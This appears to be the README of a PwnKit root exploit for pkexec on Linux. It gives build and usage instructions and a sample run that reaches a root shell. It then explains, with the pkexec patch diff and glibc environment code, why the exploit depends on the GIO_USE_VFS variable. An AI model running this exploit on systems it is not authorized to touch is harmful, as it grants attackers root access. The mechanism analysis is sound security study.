Root exploit for the PwnKit vulnerability. Check out the original report here .
Use this exploit with an express permission of the target system owners.
No dependencies needed besides libc. Just run make
Running without options will execute the exploit:
[linux@linux ~]$ ./exploit
__\ / __ __ _ __ _ __ | \ / _ ___
/ V |_ --- _)/ \ _)/| ---|_|/ \__)|_| | V |_) _/|_|
\__ |__ /__\_//__ | |\_/__) | | | \/__| |
sh-5.1# whoami
You can customize the path to pkexec
as well as the “from” charset:
[linux@linux ~]$ ./exploit -h
./exploit [-c] [-h] [-f from_charset] [-p /path/to/pkexec]
-c Just teardown - don't exploit
-p <path> Path to pkexec (default: "/usr/bin/pkexec")
-f <from_charset> Custom "from" charset (default: "UTF-8")
-h Display this message
What’s the deal with GIO_USE_VFS
I saw a few people on social media ask why does the exploit fail if the
is not defined? Why does it work with the older versions?
The culprit
is the culprit. Here’s the relevant
part of the diff:
--- a/src/programs/pkexec.c
+++ b/src/programs/pkexec.c
@@ -503,6 +503,9 @@ main (int argc, char *argv[])
opt_user = NULL;
local_agent_handle = NULL;
+ /* Disable remote file access from GIO. */
+ setenv ("GIO_USE_VFS", "local", 1);
/* check for correct invocation */
if (geteuid () != 0)
Versions prior to this commit are exploitable without the need to define the
variable. The purpose of the commit is actually a red herring.
It’s not what the variable means, it’s how it affects the environment. For the
truth we must look to libc.
Looking in libc
The process’s environment in libc is represented by an array of char *
pointed to by this global variable:
char **environ;
lives on the heap and is occasionally relocated. You might
already know where this is going. Check out this code snippet from
#if !_LIBC
# define __environ environ
extern char **environ;
# endif
__add_to_environ (const char *name, const char *value, const char *combined,
int replace)
char **ep;
// ... skipping
ep = __environ;
size = 0;
if (ep != NULL)
for (; *ep != NULL; ++ep)
if (!strncmp (*ep, name, namelen) && (*ep)[namelen] == '=')
if (ep == NULL || __builtin_expect (*ep == NULL, 1))
char **new_environ;
/* We allocated this space; we can extend it. */
new_environ = (char **) realloc (last_environ,
(size + 2) * sizeof (char *));
// ... skipping
last_environ = __environ = new_environ;
is called by both setenv(3)
and putenv(3)
to accomplish
the same thing: set an environment variable. If the environment variable in
question is not defined, environ
has to be reallocated to accommodate
a new entry (a pointer to the new environment key=value
pair). If it is
defined, the size of the environ
array has not changed and thus there is no
reason for reallocation. For brevity I’ve omitted that part of the code - I
encourage you to check it out.
Tying it all together
Now let’s come back to the exploit. If you’ve gotten this far, you probably
already know the methodology behind this exploit (if not please check out the
original report
We are trying to sneak in an environment variable by passing an empty program
arguments (argv
) to pkexec
. When argc
is truly empty (not even a program
name), the environment variables, which are adjacent to arguments clash with
it. We abuse this behavior to force pkexec
to write a canonical path of a
target executable. However, before we get this part of code we get this:
setenv ("GIO_USE_VFS", "local", 1);
If this variable is not present in the environment environ
will be
reallocated and it will never end up clashing with argv
and the out of
bounds write will never take place.